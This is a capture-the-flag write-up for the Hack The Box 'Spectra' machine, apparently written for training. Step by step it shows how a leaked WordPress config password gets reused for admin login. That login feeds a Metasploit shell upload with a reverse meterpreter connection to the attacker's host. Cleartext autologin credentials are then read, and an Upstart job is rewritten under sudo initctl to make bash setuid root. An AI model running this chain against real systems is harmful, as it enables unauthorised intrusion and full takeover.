Post

HTB Spectra Writeup

INFO

Machine IP = 10.10.10.229
OS = Other
Level = EASY
Points = 20

Write the IP of the machine to your /etc/hosts file

1
echo "10.10.10.229 spectra.htb" >> /etc/hosts

Scanning

1
nmap -sC -sV 10.10.10.229

Enumeration

Nmap:

1
2
3
4
5
22/tcp ssh  OpenSSH 8.1 (protocol 2.0)
80/tcp http nginx 1.17.4
1098/tcp filtered rmiactivation
3306/tcp mysql MySQL (unauthorized)

1
Port 80 – WordPress Blog

Create a directory Spectra and cd Spectra/ then let’s do Gobuster

Gobuster:

1
gobuster dir -u http://10.10.10.229 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
1
2
3
4
/index.html           (Status: 200) [Size: 283]
/main                 (Status: 301) [Size: 169] [--> http://10.10.10.229/main/]
/testing              (Status: 301) [Size: 169] [--> http://10.10.10.229/testing/]

We found like backup config file for a Wordpress check source here
You can Download it via

1
wget http://10.10.10.229/testing/wp-config.php.save

The important part is a user and password credential:

1
2
3
4
5
/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

Wordpress users enumeration with wpscan:

The sceound directory from Gobuster was main which is for a Wordpress

1
wpscan --url http://spectra.htb/main/ --random-user-agent --enumerate u

So we got the user administrator

1
2
3
4
5
6
7
[+] administrator
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Upload a Shell file with Metasploit:

1
msf6 > search wp_admin_shell_upload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost <Your IP here>
lhost => 10.10.15.26
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lport 4444
lport => 4444
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 10.10.10.229
rhosts => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /main
targeturi => /main
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

shell
/bin/sh -i

Or you can use:

1
2
python3 -c "import pty;pty.spawn('/bin/bash')"
nginx@spectra /tmp $ 

User Flag:

Let’s check for users:

1
2
3
4
nginx@spectra / $ cat /etc/passwd 
<SNIP>
nginx:x:20155:20156::/home/nginx:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash
1
2
3
4
nginx@spectra / $ ls -l /home/katie/
total 320
drwxr-xr-x 2 katie katie   4096 Jan 15 15:55 log
-r-------- 1 katie katie     33 Feb  2 15:57 user.txt

So we need to move from our restricted nginx user to katie to get the flag. after search on some places I found in /opt:

1
-rw-r--r-- 1 root root  978 Feb  3 16:02 autologin.conf.orig

Let’s have a look at that first:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nginx@spectra /opt $ cat autologin.conf.orig
cat autologin.conf.orig

<SNIP>
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
<SNIP>

It’s a lengthy config script but there’s a line in there that points us to /etc/autologin.

1
2
3
nginx@spectra /opt $ ls -l /etc/autologin
total 4
-rw-r--r-- 1 root root 19 Feb  3 16:43 passwd
1
2
nginx@spectra /opt $ cat /etc/autologin/passwd
SummerHereWeCome!!

Perfect. We’ve found a password which presumably is for katie as that’s the only other user on the box. Let’s try SSH:

1
2
3
ssh [email protected]
katie@spectra ~ $ cat user.txt

Root Flag:

Now we have to escalate our privilege. I going to check a sudo privileges first and if fail I’ll go with linPEAS:

1
2
3
katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl

What is a initctl:

1
2
3
initctl allows a system administrator to communicate and interact with the Upstart init(8) daemon.

init is the parent of all processes on the system, it is executed by the kernel and is responsible for starting all other processes.

So we can use initctl to control starting and stopping processes as system. Sounds like a nice simple way to get a root shell. First let’s see what’s /etc/init:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
katie@spectra /etc/init $ ls -l
total 752
...
-rw-rw---- 1 root developers  478 Jun 29  2020 test.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test1.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test10.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test2.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test3.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test4.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test5.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test6.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test7.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test8.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test9.conf
...

Let’s check out the first one:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
katie@spectra /etc/init $ cat test.conf
description "Test node.js server"
author      "katie"
start on filesystem or runlevel [2345]
stop on shutdown
script
    export HOME="/srv"
    echo $$ > /var/run/nodetest.pid
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js
end script
pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script
pre-stop script
    rm /var/run/nodetest.pid
    echo

We can replace the contents of this with our own code, let’s get it to change permissions on /bin/bash so we can run it with root permissions as katie.

First find the test process:

1
2
3
4
5
6
7
8
katie@spectra /etc/init $ sudo initctl list | grep test
test stop/waiting
test1 stop/waiting
test7 stop/waiting
test6 stop/waiting
test5 stop/waiting
test4 stop/waiting
test10 stop/waiting

It’s already stopped, so we can edit the conf file and the start it again:

1
2
3
4
5
6
7
8
9
katie@spectra /etc/init $ cat test.conf 
description "Test node.js server"
author      "katie"
start on filesystem or runlevel [...]
stop on shutdown

script
chmod +s /bin/bash
end script

Now we can start the process:

1
katie@spectra /etc/init $ sudo /sbin/initctl start test

Now we can simply run bash with the -p option to get our root shell:

1
2
3
katie@spectra /etc/init $ /bin/bash -p
bash-4.3# whoami
root

Grab the root flag and we are done:

1
2
bash-4.3# cat /root/root.txt

Done!.


Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

This post is licensed under CC BY 4.0 by the author.